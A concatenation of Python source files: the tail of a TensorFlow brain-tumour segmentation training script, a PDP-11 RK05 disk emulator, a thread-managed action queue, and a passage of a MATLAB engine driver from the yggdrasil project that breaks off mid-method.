            # n_pos = int(foreground.shape[1] * discount)
            foreground = foreground[:, np.random.permutation(foreground.shape[1])[:n_pos]]
            background = background[:, np.random.permutation(background.shape[1])[:n_neg]]
            centers = np.concatenate((foreground, background), axis=1)
            # Shuffle so batches interleave positive and negative centers.
            centers = centers[:, np.random.permutation(n_neg+n_pos)]
            yield data_norm, labels, centers
def label_transform(y, nlabels):
    """Return [binary one-hot (tumor vs background), full nlabels one-hot] for y."""
    base_shape = [y.shape[0], y.shape[1], y.shape[2], y.shape[3]]
    binary = keras.utils.to_categorical(np.copy(y).astype(dtype=np.bool),
                                        num_classes=2).reshape(base_shape + [2])
    full = keras.utils.to_categorical(y,
                                      num_classes=nlabels).reshape(base_shape + [nlabels])
    return [binary, full]
def train():
    # End-to-end TF1 training loop for the two-pathway BraTS segmentation
    # model: builds the graph, samples patches per patient, and checkpoints
    # each epoch.  NOTE: this file is Python 2 (print statements, .next()).
    NUM_EPOCHS = options['num_epochs']
    LOAD_PATH = options['load_path']
    SAVE_PATH = options['save_path']
    PSIZE = options['psize']
    HSIZE = options['hsize']
    WSIZE = options['wsize']
    CSIZE = options['csize']
    model_name= options['model_name']
    BATCH_SIZE = options['batch_size']
    continue_training = options['continue_training']
    lr = tf.Variable(5e-4, trainable=False)
    files = []
    num_labels = 5
    files = get_dataset_dirnames(options['root_path'])
    print '%d training samples' % len(files)
    # Two input pathways: flair+t2 and t1+t1ce, each 2 channels.
    flair_t2_node = tf.placeholder(dtype=tf.float32, shape=(None, HSIZE, WSIZE, CSIZE, 2))
    t1_t1ce_node = tf.placeholder(dtype=tf.float32, shape=(None, HSIZE, WSIZE, CSIZE, 2))
    # Ground truth: binary (tumor/background) and 5-class label patches.
    flair_t2_gt_node = tf.placeholder(dtype=tf.int32, shape=(None, PSIZE, PSIZE, PSIZE, 2))
    t1_t1ce_gt_node = tf.placeholder(dtype=tf.int32, shape=(None, PSIZE, PSIZE, PSIZE, 5))
    # Select the backbone; each returns features at two receptive-field scales.
    if model_name == 'dense48':
        flair_t2_15, flair_t2_27 = tf_models.BraTS2ScaleDenseNetConcat_large(input=flair_t2_node, name='flair')
        t1_t1ce_15, t1_t1ce_27 = tf_models.BraTS2ScaleDenseNetConcat_large(input=t1_t1ce_node, name='t1')
    elif model_name == 'no_dense':
        flair_t2_15, flair_t2_27 = tf_models.PlainCounterpart(input=flair_t2_node, name='flair')
        t1_t1ce_15, t1_t1ce_27 = tf_models.PlainCounterpart(input=t1_t1ce_node, name='t1')
    elif model_name == 'dense24':
        flair_t2_15, flair_t2_27 = tf_models.BraTS2ScaleDenseNetConcat(input=flair_t2_node, name='flair')
        t1_t1ce_15, t1_t1ce_27 = tf_models.BraTS2ScaleDenseNetConcat(input=t1_t1ce_node, name='t1')
    else:
        print' No such model name '
    # The t1/t1ce pathway also sees the flair/t2 features (feature fusion).
    t1_t1ce_15 = concatenate([t1_t1ce_15, flair_t2_15])
    t1_t1ce_27 = concatenate([t1_t1ce_27, flair_t2_27])
    # 1x1x1 classification heads at both scales.
    flair_t2_15 = Conv3D(2, kernel_size=1, strides=1, padding='same', name='flair_t2_15_cls')(flair_t2_15)
    flair_t2_27 = Conv3D(2, kernel_size=1, strides=1, padding='same', name='flair_t2_27_cls')(flair_t2_27)
    t1_t1ce_15 = Conv3D(num_labels, kernel_size=1, strides=1, padding='same', name='t1_t1ce_15_cls')(t1_t1ce_15)
    t1_t1ce_27 = Conv3D(num_labels, kernel_size=1, strides=1, padding='same', name='t1_t1ce_27_cls')(t1_t1ce_27)
    # Sum the two scales over the central 12^3 prediction region.
    # NOTE(review): the 13:25 crop assumes the 38->12 patch geometry from the
    # default CLI sizes -- confirm before changing hsize/psize.
    flair_t2_score = flair_t2_15[:, 13:25, 13:25, 13:25, :] + \
        flair_t2_27[:, 13:25, 13:25, 13:25, :]
    t1_t1ce_score = t1_t1ce_15[:, 13:25, 13:25, 13:25, :] + \
        t1_t1ce_27[:, 13:25, 13:25, 13:25, :]
    # Joint loss: binary task + 5-class task.
    loss = segmentation_loss(flair_t2_gt_node, flair_t2_score, 2) + \
        segmentation_loss(t1_t1ce_gt_node, t1_t1ce_score, 5)
    acc_flair_t2 = acc_tf(y_pred=flair_t2_score, y_true=flair_t2_gt_node)
    acc_t1_t1ce = acc_tf(y_pred=t1_t1ce_score, y_true=t1_t1ce_gt_node)
    # Run batch-norm (and similar) update ops together with the train step.
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
        optimizer = tf.train.AdamOptimizer(learning_rate=lr).minimize(loss)
    saver = tf.train.Saver(max_to_keep=15)
    data_gen_train = vox_generator(all_files=files, n_pos=200, n_neg=200)

    def single_gpu_fn(nb, gpuname='/device:GPU:0', q=None):  # q - result queue
        # Run one optimization step on one batch; reads data/labels/centers
        # and sess from the enclosing scope.
        with tf.device(gpuname):
            offset_batch = min(nb * BATCH_SIZE, centers.shape[1] - BATCH_SIZE)
            data_batch, label_batch = get_patches_3d(data, labels, centers[:, offset_batch:offset_batch + BATCH_SIZE], HSIZE, WSIZE, CSIZE, PSIZE, False)
            label_batch = label_transform(label_batch, 5)
            _, l, acc_ft, acc_t1c = sess.run(fetches=[optimizer, loss, acc_flair_t2, acc_t1_t1ce],
                                             feed_dict={flair_t2_node: data_batch[:, :, :, :, :2],
                                                        t1_t1ce_node: data_batch[:, :, :, :, 2:],
                                                        flair_t2_gt_node: label_batch[0],
                                                        t1_t1ce_gt_node: label_batch[1],
                                                        })
            n_pos_sum = np.sum(np.reshape(label_batch[0], (-1, 2)), axis=0)
            return acc_ft, acc_t1c, l, n_pos_sum

    # Each run gets a fresh numbered checkpoint directory under chkpts/.
    if not os.path.isdir('chkpts'):
        os.mkdir('chkpts')
        os.mkdir('chkpts/0')
        save_point = 0
    else:
        save_point = sorted([int(x.split('/')[-1]) for x in glob.glob('chkpts/*')])[-1] + 1
        os.mkdir('chkpts/%d'%save_point)
    with tf.Session() as sess:
        if continue_training:
            saver.restore(sess, LOAD_PATH)
        else:
            sess.run(tf.global_variables_initializer())
        for ei in range(NUM_EPOCHS):
            for pi in range(len(files)):
                acc_pi, loss_pi = [], []
                data, labels, centers = data_gen_train.next()
                n_batches = int(np.ceil(float(centers.shape[1]) / BATCH_SIZE))
                threads = []
                for nb in range(0, n_batches, len(options['gpu_ids'])):
                    for gi, x in enumerate(options['gpu_ids']):
                        #t = time.time()
                        acc_ft, acc_t1c, l, n_pos_sum = single_gpu_fn(nb+gi)
                        acc_pi.append([acc_ft, acc_t1c])
                        loss_pi.append(l)
                        # Disabled multi-GPU threading experiment (see import
                        # note at top: Thread OOMs out); kept for reference.
                        '''
                        q = [Queue.Queue() for _ in range(4)]
                        t = Thread(target=single_gpu_fn, args=(nb+gi,'/device:GPU:%d'%x, q))
                        threads.append(t)
                        for th in threads:
                            th.start()
                        for th in threads:
                            th.join()
                        threads = []
                        queue_avg = lambda x, i: np.average(list(x[i].queue))
                        acc_ft, acc_t1c, l, n_pos_sum = queue_avg(q, 0), queue_avg(q, 1), queue_avg(q, 2), np.mean(list(q[3].queue), axis=0)
                        '''
                    #print ('TIME: %.4f'%(time.time()-t))
                    print 'epoch-patient: %d, %d, iter: %d-%d, p%%: %.4f, loss: %.4f, acc_flair_t2: %.2f%%, acc_t1_t1ce: %.2f%%' % \
                        (ei + 1, pi + 1, nb + 1, n_batches, n_pos_sum[1]/float(np.sum(n_pos_sum)), l, acc_ft, acc_t1c)
                print 'patient loss: %.4f, patient acc: %.4f' % (np.mean(loss_pi), np.mean(acc_pi))
            saver.save(sess, 'chkpts/'+str(save_point)+'/'+SAVE_PATH+'.ckpt', global_step=ei)
            print 'model saved'
            # NOTE(review): reassigning lr to exponential_decay here creates a
            # new tensor rather than updating the optimizer's variable --
            # the optimizer keeps using the original lr; confirm intent.
            lr = tf.train.exponential_decay(lr, ei, 1, 0.25, staircase=True)
# Script entry point: run the full training loop with CLI-provided options.
if __name__ == '__main__':
    train()
|
rk05.py | #!/usr/bin/env python3
# This is a translation of Julius Schmidt's PDP-11 emulator in JavaScript.
# You can run that one in your browser: http://pdp11.aiju.de
# (c) 2011, Julius Schmidt, JavaScript implementation, MIT License
# (c) 2019, Andriy Makukha, ported to Python 3, MIT License
# Version 6 Unix (in the disk image) is available under the four-clause BSD license.
import time, array, threading
from interrupt import Interrupt
from unix_v6_fs import UnixV6FileSystem
class System:
    """Minimal stand-in for the PDP-11 system an RK05 drive plugs into.

    Provides just enough surface (memory, interrupt, event, panic) for the
    RK05 class to be exercised stand-alone.
    """

    def __init__(self):
        # 128K 16-bit unsigned words (256 KB), zero-initialized.
        self.memory = array.array('H', bytes(256*1024))
        print('Memory initialized')

    def interrupt(self, intr, y):
        """CPU interrupt hook; a full emulator would service it (no-op here)."""
        pass

    def event(self, *evn):
        """UI event hook (no-op here).

        In the JavaScript original these toggled DOM indicators:
        'rkbusy'  = document.getElementById('rkbusy').style.display = '';
        'rkready' = document.getElementById('rkbusy').style.display = 'none';
        """
        pass

    def panic(self, msg):
        """Report a fatal emulator condition."""
        print('PANIC: ', msg)
class RK05:
    '''RK05 was a magnetic disk drive produced by DEC. It stored approximately 2.5 MB on
    a 14 inch front-loading removable disk cartridge.'''

    EXPECTED_IMAGE_LENGTH = 2077696
    IMAGE_FILENAME = 'rk0.img'

    # Error codes (bits OR-ed into the RKER error register)
    RKOVR = (1<<14)  # operation overflowed the disk
    RKNXD = (1<<7)   # non-existent disk (drive)
    RKNXC = (1<<6)   # non-existent cylinder
    RKNXS = (1<<5)   # non-existent sector

    def __init__(self, system):
        # system provides memory, interrupt(), event(), panic() hooks.
        self.system = system
        #self.reinit()

    def reinit(self):
        # rkinit: load the disk image and reset head position + registers.
        self.load_image(RK05.IMAGE_FILENAME)
        # Current "physical" position of the head
        self.drive = 0
        self.sector = 0
        self.surface = 0
        self.cylinder = 0
        self.reset()

    def save_image(self, filename):
        # Dump the in-memory disk image back to a file.
        open(filename, 'wb').write(self.disk)

    def load_image(self, filename):
        # Read the whole cartridge image into a mutable byte buffer.
        self.disk = bytearray(open(filename, 'rb').read())
        if len(self.disk) != RK05.EXPECTED_IMAGE_LENGTH:
            self.system.panic('unexpected image length {} != {}'.format(len(self.disk), RK05.EXPECTED_IMAGE_LENGTH))
        print ('Disk image loaded:', len(self.disk))
        # TODO: extend image with free bytes, but also add those blocks to the free blocks chain
        #max_bytes = 0o313*0o14*2*512 # 4872 blocks, 2494464 bytes
        #if len(self.disk) < max_bytes:
        #    extend_by = max_bytes - len(self.disk)
        #    self.disk.extend(bytearray(extend_by*[0]))
        #    print (' - free space:', extend_by)

    def start_sync_thread(self, unix_dir: str, local_dir: str):
        # Launch a daemon thread that mirrors a Unix directory inside the
        # image with a local host directory (see sync_method).
        self._unix_dir = unix_dir
        self._local_dir = local_dir
        self.sync_running = threading.Event()
        self.sync_finished = threading.Event()
        self.sync_finished.clear()
        self.sync_thread = threading.Thread(target=self.sync_method)
        self.sync_thread.daemon = True
        self.sync_thread.start()

    def sync_method(self):
        '''The purpose of this thread is to:
        1) execute `sync` command before taking the filesystem snapshot
        2) pass the syncing work to the filesystem class using that snapshot
        3) wait for the syncing to finish, then take modified filesystem and replace the current one if Unix is not live
        '''
        # If Unix is up (a prompt has appeared), flush its buffers first.
        if self.system.terminal.prompt_cnt > 0:
            self.sync_running.clear()
            self.system.terminal.queue_command('sync', self.sync_prompt)
            self.sync_running.wait()
        # TODO: check if filesystem is locked
        try:
            # Work on an immutable snapshot so the emulator can keep writing.
            disk_snapshot = bytes(self.disk)
            self.fs = UnixV6FileSystem(disk_snapshot)
            self.fs.start_sync_thread(self._unix_dir, self._local_dir, self.system.terminal)
            self.fs.sync_finished.wait()
            # Replace current disk image with the synced one if Unix is not live
            if self.system.terminal.prompt_cnt == 0:
                self.fs.f.seek(0)
                disk = self.fs.f.read()
                # Cheap hash check first; full compare confirms a real change.
                if hash(disk_snapshot) != hash(disk) and disk_snapshot != disk:
                    self.disk = bytearray(disk)
                    self.system.writedebug('Disk image replaced with a synced one\n')
            msg = 'Unix directory {} synced with local directory {}\n'.format(self._unix_dir, self._local_dir)
            self.system.writedebug(msg)
        except Exception as e:
            raise e

    def sync_prompt(self, last_printed):
        # Callback fired by the terminal once the `sync` command completed.
        self.sync_running.set()

    def reset(self):
        # Reset registers to default values
        self.DS = (1 << 11) | (1 << 7) | (1 << 6)  # drive status
        self.ER = 0                                # error register
        self.CS = 1 << 7                           # control/status (ready)
        self.WC = 0                                # word count
        self.BA = 0                                # bus address
        self.DB = 0                                # data buffer

    def read16(self, a):
        # Memory-mapped register reads (Unibus addresses 0o777400..).
        if a == 0o777400:
            return self.DS
        elif a ==0o0777402:
            return self.ER
        elif a == 0o0777404:
            # Bits 4-5 of CS mirror the bus-address extension bits 16-17.
            return self.CS | ((self.BA & 0x30000) >> 12)
        elif a == 0o0777406:
            return self.WC
        elif a == 0o0777410:
            return self.BA & 0xFFFF
        elif a == 0o0777412:
            return (self.sector) | (self.surface << 4) | (self.cylinder << 5) | (self.drive << 13)
        else:
            # NOTE(review): falls through returning None after panic.
            self.system.panic('invalid read')

    def notready(self):
        # Clear the "ready" bits in DS and CS while an operation runs.
        #self.system.event('rkbusy') # TODO
        self.DS &= ~(1<<6)
        self.CS &= ~(1<<7)

    def ready(self):
        # Set the "ready" bits again once an operation completes.
        #self.system.event('rkready') # TODO
        self.DS |= 1<<6
        self.CS |= 1<<7

    def error(self, code):
        # Record an error code and panic with a readable message.
        self.ready()
        self.ER |= code
        self.CS |= (1<<15) | (1<<14)
        # NOTE(review): an unknown code would leave msg unbound
        # (UnboundLocalError) -- all current callers pass a known code.
        if code == RK05.RKOVR:
            msg = "operation overflowed the disk"
        elif code == RK05.RKNXD:
            msg = "invalid disk accessed"
        elif code == RK05.RKNXC:
            msg = "invalid cylinder accessed"
        elif code == RK05.RKNXS:
            msg = "invalid sector accessed"
        self.system.panic(msg)

    def rwsec(self, write):
        '''Read/write entire sector (512 bytes) to/from memory'''
        # Validate head position; geometry is 0o313 cylinders x 2 surfaces
        # x 0o14 sectors.
        if self.drive != 0: self.error(RK05.RKNXD)
        if self.cylinder > 0o312: self.error(RK05.RKNXC)
        if self.sector > 0o13: self.error(RK05.RKNXS)
        pos = (self.cylinder * 24 + self.surface * 12 + self.sector) * 512
        # Transfer up to 256 words; WC is the two's-complement word count,
        # counting up toward 0.
        for i in range(0, 256):
            if not self.WC: break
            if write:
                # Words are 16-bit
                val = self.system.memory[self.BA >> 1]
                self.disk[pos] = val & 0xFF
                self.disk[pos+1] = (val >> 8) & 0xFF
            else:
                self.system.memory[self.BA >> 1] = self.disk[pos] | (self.disk[pos+1] << 8)
            self.BA += 2
            self.WC = (self.WC + 1) & 0xFFFF
            pos += 2
        # Check for overflow: advance sector -> surface -> cylinder.
        self.sector += 1
        if self.sector > 0o13:
            self.sector = 0
            self.surface += 1
            if self.surface > 1:
                self.surface = 0
                self.cylinder += 1
                if self.cylinder > 0o312:
                    self.error(RK05.RKOVR)
        if self.WC:
            # More words to move: recurse for the next sector.
            #setTimeout('rkrwsec('+t+')', 3);
            #time.sleep(0.003) # seems unnecessary
            self.rwsec(write)
        else:
            self.ready()
            # Raise an interrupt if interrupt-enable (bit 6) is set in CS.
            if self.CS & (1<<6):
                self.system.interrupt(Interrupt.RK, 5)

    def go(self):
        # Execute the function selected by CS bits 1-3 after GO was set.
        op = (self.CS & 0xF) >> 1
        if op == 0:
            self.system.writedebug('WARNING: resetting the drive via op == 0\n')
            self.reset()
        elif op == 1:
            # Write memory -> disk.
            self.notready()
            #setTimeout('rkrwsec(true)', 3)
            time.sleep(0.003) # TODO: do we need it?
            self.rwsec(True)
        elif op == 2:
            # Read disk -> memory.
            self.notready()
            #setTimeout('rkrwsec(false)', 3)
            time.sleep(0.003) # TODO: do we need it?
            self.rwsec(False)
        else:
            self.system.panic('unimplemented RK05 operation 0x{:x}'.format(op))

    def write16(self, a, v):
        # Memory-mapped register writes; DS and ER are read-only.
        if a in [0o777400, 0o777402]: return
        elif a == 0o777404:
            # Bits 4-5 of the written value extend BA to 18 bits.
            self.BA = (self.BA & 0xFFFF) | ((v & 0o60) << 12)
            v &= 0o17517 # writable bits
            self.CS &= ~0o17517
            self.CS |= v & ~1 # dont set GO bit
            if v & 1:
                self.go()
        elif a == 0o777406:
            self.WC = v
        elif a == 0o777410:
            self.BA = (self.BA & 0x30000) | v
        elif a == 0o777412:
            # Disk-address register: drive/cylinder/surface/sector fields.
            self.drive = v >> 13
            self.cylinder = (v >> 5) & 0o377
            self.surface = (v >> 4) & 1
            self.sector = v & 15
        else:
            self.system.panic('invalid write')
# Smoke test: build the stub system and attach a drive.  No image is loaded
# here; call rk05.reinit() to load rk0.img.
if __name__=='__main__':
    sys = System()
    rk05 = RK05(sys)
|
action_queue.py | '''ActionQueue: a background worker that manages its own worker thread automatically.'''
from threading import Thread, Lock, Event
from queue import Queue, Empty
__all__ = [
'ActionQueue',
]
class ActionQueue:
    '''A background worker that manages its own worker thread automatically.

    Enqueue work items using .put(). Work items are functions that do not
    take any parameters and return None.

    .put() returns immediately. The work items are processed in a background
    thread, in the order in which they arrived. Only one work item is processed
    at a time.

    The background thread is started when there is work to do, and torn down
    when the queue is empty.
    '''

    def __init__(self):
        self._queue = Queue()            # pending work items (FIFO)
        self._thread = None              # current worker thread, if any
        self._running = Event()          # set while a worker is alive
        self._startstop_lock = Lock()    # serializes start/stop decisions

    def put(self, action):
        '''Put an action into the queue.

        Parameters:
            action (func): a callable without params. The return value is not used.
        '''
        # The lock makes "enqueue + maybe start worker" atomic with respect
        # to the worker's "dequeue or shut down" step in _run_worker, so a
        # worker can never shut down while an item it missed sits queued.
        with self._startstop_lock:
            self._queue.put(action)
            if not self._running.is_set():
                self._thread = Thread(target=self._run_worker, name='ActionQueue')
                self._thread.start()
                # Wait until the new worker flags itself as running before
                # returning, so a subsequent put() won't start a second one.
                self._running.wait()

    def _run_worker(self):
        self._running.set()
        while True:
            # Take the lock for each dequeue attempt: if the queue is empty
            # we must clear _running and exit atomically, otherwise put()
            # could enqueue into a queue whose worker is about to die.
            with self._startstop_lock:
                try:
                    action = self._queue.get_nowait()
                except Empty:
                    self._running.clear()
                    return
            # Run the action outside the lock so put() is never blocked by
            # a long-running work item.
            action()
|
MatlabModelDriver.py | import subprocess
import uuid as uuid_gen
import logging
from datetime import datetime
import os
import glob
import psutil
import warnings
import weakref
import io as sio
from yggdrasil import tools, platform, serialize
from yggdrasil.languages import get_language_dir
from yggdrasil.config import ygg_cfg
from yggdrasil.drivers.InterpretedModelDriver import InterpretedModelDriver
from yggdrasil.tools import TimeOut, sleep
logger = logging.getLogger(__name__)
# Decide at import time whether the MATLAB engine bridge is usable.  The
# engine is disabled on Windows or when the 'matlab.disable_engine' config
# flag is set; otherwise importing matlab.engine probes the installation.
try:  # pragma: matlab
    disable_engine = ygg_cfg.get('matlab', 'disable_engine', 'False').lower()
    if platform._is_win or (disable_engine == 'true'):
        _matlab_engine_installed = False
        if not tools.is_subprocess():
            logger.debug("matlab.engine disabled")
    else:
        import matlab.engine
        _matlab_engine_installed = True
except ImportError:  # pragma: no matlab
    logger.debug("Could not import matlab.engine. "
                 + "Matlab support for using a sharedEngine will be disabled.")
    _matlab_engine_installed = False

# Directory holding the yggdrasil MATLAB language support files.
_top_lang_dir = get_language_dir('matlab')
# MATLAB release -> Python versions supported by its engine API.
_compat_map = {
    'R2015b': ['2.7', '3.3', '3.4'],
    'R2017a': ['2.7', '3.3', '3.4', '3.5'],
    'R2017b': ['2.7', '3.3', '3.4', '3.5', '3.6'],
    'R2018b': ['2.7', '3.3', '3.4', '3.5', '3.6']}
def kill_all():
    r"""Kill all Matlab shared engines."""
    if platform._is_win:  # pragma: windows
        cmd = 'taskkill /F /IM matlab.engine.shareEngine /T'
    else:
        cmd = 'pkill -f matlab.engine.shareEngine'
    os.system(cmd)
def locate_matlab_engine_processes():  # pragma: matlab
    r"""Get all of the active matlab sharedEngine processes.

    Returns:
        list: Active matlab sharedEngine processes.
    """
    found = []
    for proc in psutil.process_iter():
        # Cache the attributes we need on the process object itself.
        proc.info = proc.as_dict(attrs=['name', 'pid', 'cmdline'])
        is_shared_engine = ((proc.info['name'] == 'MATLAB')
                            and ('matlab.engine.shareEngine' in proc.info['cmdline']))
        if is_shared_engine:
            found.append(proc)
    return found
def is_matlab_running():
    r"""Determine if there is a Matlab engine running.

    Returns:
        bool: True if there is a Matlab engine running, False otherwise.
    """
    if not _matlab_engine_installed:  # pragma: no matlab
        return False
    # pragma: matlab
    return len(matlab.engine.find_matlab()) != 0
def locate_matlabroot():  # pragma: matlab
    r"""Find directory that serves as matlab root.

    Returns:
        str: Full path to matlabroot directory.
    """
    # Delegates to MatlabModelDriver (defined later in this module).
    return MatlabModelDriver.get_matlab_info()[0]
def install_matlab_engine():  # pragma: matlab
    r"""Install the MATLAB engine API for Python."""
    if _matlab_engine_installed:
        # Nothing to do; the engine already imports cleanly.
        return
    mtl_root = locate_matlabroot()
    mtl_setup = os.path.join(mtl_root, 'extern', 'engines', 'python')
    cmd = 'python setup.py install'
    result = subprocess.check_output(cmd, cwd=mtl_setup)
    print(result)
def start_matlab_engine(skip_connect=False, timeout=None):  # pragma: matlab
    r"""Start a Matlab shared engine session inside a detached screen
    session.

    Args:
        skip_connect (bool, optional): If True, the engine is not connected.
            Defaults to False.
        timeout (int, optional): Time (in seconds) that should be waited for
            Matlab to start up. Defaults to None and is set from the config
            option ('matlab', 'startup_waittime_s').

    Returns:
        tuple: Information on the started session including the name of the
            screen session running matlab, the created engine object, the name
            of the matlab session, and the matlab engine process.

    Raises:
        RuntimeError: If Matlab is not installed.
    """
    if not _matlab_engine_installed:  # pragma: no matlab
        raise RuntimeError("Matlab engine is not installed.")
    if timeout is None:
        timeout = float(ygg_cfg.get('matlab', 'startup_waittime_s', 10))
    # Snapshot existing processes/sessions so the new ones can be identified
    # by set difference after startup.
    old_process = set(locate_matlab_engine_processes())
    old_matlab = set(matlab.engine.find_matlab())
    # Timestamped, counted name keeps concurrent sessions distinct.
    screen_session = str('ygg_matlab' + datetime.today().strftime("%Y%j%H%M%S")
                         + '_%d' % len(old_matlab))
    try:
        args = ['screen', '-dmS', screen_session, '-c',
                os.path.join(_top_lang_dir, 'matlab_screenrc'),
                'matlab', '-nodisplay', '-nosplash', '-nodesktop', '-nojvm',
                '-r', '"matlab.engine.shareEngine"']
        subprocess.call(' '.join(args), shell=True)
        # Poll until a new shared session appears or the timeout expires.
        T = TimeOut(timeout)
        while ((len(set(matlab.engine.find_matlab()) - old_matlab) == 0)
               and not T.is_out):
            logger.debug('Waiting for matlab engine to start')
            sleep(1)  # Usually 3 seconds
    except KeyboardInterrupt:  # pragma: debug
        # Tear down the screen session before propagating the interrupt.
        args = ['screen', '-X', '-S', screen_session, 'quit']
        subprocess.call(' '.join(args), shell=True)
        raise
    if (len(set(matlab.engine.find_matlab()) - old_matlab) == 0):  # pragma: debug
        raise Exception("start_matlab timed out at %f s" % T.elapsed)
    new_matlab = list(set(matlab.engine.find_matlab()) - old_matlab)[0]
    new_process = list(set(locate_matlab_engine_processes()) - old_process)[0]
    # Connect to the engine
    matlab_engine = None
    if not skip_connect:
        matlab_engine = connect_matlab_engine(new_matlab, first_connect=True)
    return screen_session, matlab_engine, new_matlab, new_process
def connect_matlab_engine(matlab_session, first_connect=False):  # pragma: matlab
    r"""Connect to Matlab engine.

    Args:
        matlab_session (str): Name of the Matlab session that should be
            connected to.
        first_connect (bool, optional): If True, this is the first time
            Python is connecting to the Matlab shared engine and certain
            environment variables should be set. Defaults to False.

    Returns:
        MatlabEngine: Matlab engine that was connected.
    """
    matlab_engine = matlab.engine.connect_matlab(matlab_session)
    # Clear cached class definitions so updated .m files are picked up.
    matlab_engine.eval('clear classes;', nargout=0)
    err = sio.StringIO()
    try:
        # Probe whether the yggdrasil interface is already on the MATLAB
        # path; any failure means the paths still need to be added.
        matlab_engine.eval("YggInterface('YGG_MSG_MAX');", nargout=0,
                           stderr=err)
    except BaseException:
        for x in MatlabModelDriver.paths_to_add:
            matlab_engine.addpath(x, nargout=0)
    matlab_engine.eval("os = py.importlib.import_module('os');", nargout=0)
    return matlab_engine
def stop_matlab_engine(screen_session, matlab_engine, matlab_session,
                       matlab_process, keep_engine=False):  # pragma: matlab
    r"""Stop a Matlab shared engine session running inside a detached screen
    session.

    Args:
        screen_session (str): Name of the screen session that the shared
            Matlab session was started in.
        matlab_engine (MatlabEngine): Matlab engine that should be stopped.
        matlab_session (str): Name of Matlab session that the Matlab engine is
            connected to.
        matlab_process (psutil.Process): Process running the Matlab shared engine.
        keep_engine (bool, optional): If True, the references to the engine will be
            removed so it is not deleted. Defaults to False.

    Raises:
        RuntimeError: If Matlab is not installed.
    """
    if not _matlab_engine_installed:  # pragma: no matlab
        raise RuntimeError("Matlab engine is not installed.")
    if keep_engine and (matlab_engine is not None):
        # Only disconnect this client; leave the shared engine running.
        if '_matlab' in matlab_engine.__dict__:
            matlab_engine.quit()
        return
    # Remove weakrefs to engine to prevent stopping engine more than once
    if matlab_engine is not None:
        # Remove weak references so engine not deleted on exit
        eng_ref = weakref.getweakrefs(matlab_engine)
        for x in eng_ref:
            if x in matlab.engine._engines:
                matlab.engine._engines.remove(x)
        # Either exit the engine or remove its reference
        if matlab_session in matlab.engine.find_matlab():
            try:
                matlab_engine.eval('exit', nargout=0)
            except BaseException:
                # 'exit' tears the connection down, so errors are expected.
                pass
        else:  # pragma: no cover
            matlab_engine.__dict__.pop('_matlab', None)
    # Stop the screen session containing the Matlab shared session
    if screen_session is not None:
        if matlab_session in matlab.engine.find_matlab():
            os.system(('screen -X -S %s quit') % screen_session)
        # Give the session up to 5 seconds to disappear before force-killing.
        T = TimeOut(5)
        while ((matlab_session in matlab.engine.find_matlab())
               and not T.is_out):
            logger.debug("Waiting for matlab engine to exit")
            sleep(1)
        if (matlab_session in matlab.engine.find_matlab()):  # pragma: debug
            if matlab_process is not None:
                matlab_process.terminate()
                logger.error("stop_matlab_engine timed out at %f s. " % T.elapsed
                             + "Killed Matlab sharedEngine process.")
class MatlabProcess(tools.YggClass):  # pragma: matlab
    r"""Add features to mimic subprocess.Popen while running Matlab function
    asynchronously.

    Args:
        target (func): Matlab function that should be called.
        args (list, tuple): Arguments that should be passed to target.
        kwargs (dict, optional): Keyword arguments that should be passed to
            target. Defaults to empty dict.
        name (str, optional): A name for the process. Generated if not provided.
        matlab_engine (MatlabEngine, optional): MatlabEngine that should be used
            to get errors. Defaults to None and errors will not be recovered
            unless passed through stdout and stderr before shutdown.

    Attributes:
        stdout (StringIO): File like string buffer that stdout from target will
            be written to.
        stderr (StringIO): File like string buffer that stderr from target will
            be written to.
        target (func): Matlab function that should be called.
        args (list, tuple): Arguments that should be passed to target.
        kwargs (dict): Keyword arguments that should be passed to target.
        future (MatlabFutureResult): Future result from async function. This
            will be None until start is called.
        matlab_engine (MatlabEngine): MatlabEngine that should be used to get
            errors.

    Raises:
        RuntimeError: If Matlab is not installed.

    """

    def __init__(self, target, args, kwargs=None, name=None, matlab_engine=None):
        if not _matlab_engine_installed:  # pragma: no matlab
            raise RuntimeError("Matlab engine is not installed.")
        if kwargs is None:
            kwargs = {}
        # Buffers capturing the Matlab call's output streams.
        self.stdout = sio.StringIO()
        self.stderr = sio.StringIO()
        # Cached snapshots of the buffers (see stdout_line/stderr_line).
        self._stdout_line = None
        self._stderr_line = None
        self.target = target
        self.args = args
        self.kwargs = kwargs
        self.kwargs.update(nargout=0, stdout=self.stdout, stderr=self.stderr)
        # 'async' became a reserved word in Python 3.7, so it cannot be
        # written as a literal keyword argument above.
        self.kwargs['async'] = True  # For python 3.7 where async is reserved
        self.future = None
        self.matlab_engine = matlab_engine
        self._returncode = None
        super(MatlabProcess, self).__init__(name)
    def poll(self, *args, **kwargs):
        r"""Fake poll."""
        # Mimics subprocess.Popen.poll; arguments are accepted but ignored.
        return self.returncode

    @property
    def stdout_line(self):
        r"""str: Output to stdout from function call."""
        # Cache the buffer contents once non-empty output appears; after
        # caching, later writes to the buffer are not reflected.
        if self._stdout_line is None:
            if self.stdout is not None:
                line = self.stdout.getvalue()
                if line:
                    self._stdout_line = line
        return self._stdout_line

    @property
    def stderr_line(self):
        r"""str: Output to stderr from function call."""
        # Same one-shot caching as stdout_line.
        if self._stderr_line is None:
            if self.stderr is not None:
                line = self.stderr.getvalue()
                if line:
                    self._stderr_line = line
        return self._stderr_line

    def print_output(self):
        r"""Print output from stdout and stderr."""
        if self.stdout_line:
            self.print_encoded(self.stdout_line, end="")
        if self.stderr_line:
            self.print_encoded(self.stderr_line, end="")
    def start(self):
        r"""Start asynchronous call."""
        self.future = self.target(*self.args, **self.kwargs)

    def is_started(self):
        r"""bool: Has start been called."""
        return (self.future is not None)

    def is_cancelled(self):
        r"""bool: Was the async call cancelled or not."""
        if self.is_started():
            try:
                return self.future.cancelled()
            except matlab.engine.EngineError:
                # Engine died; record the Matlab-side error and report
                # the call as cancelled.
                self.on_matlab_error()
                return True
            except BaseException:
                # Any other failure querying the future is treated as
                # cancelled (best-effort status check).
                return True
        return False

    def is_done(self):
        r"""bool: Is the async call still running."""
        if self.is_started():
            try:
                return self.future.done() or self.is_cancelled()
            except matlab.engine.EngineError:
                self.on_matlab_error()
                return True
            except BaseException:
                return True
        return False

    def is_alive(self):
        r"""bool: Is the async call running."""
        # Not started yet counts as not alive.
        if self.is_started():
            return (not self.is_done())
        return False
    @property
    def returncode(self):
        r"""int: Return code."""
        if self.is_done():
            # Any captured stderr output is treated as failure.
            if self.stderr_line:  # or self.is_cancelled():
                return -1
            else:
                return 0
        else:
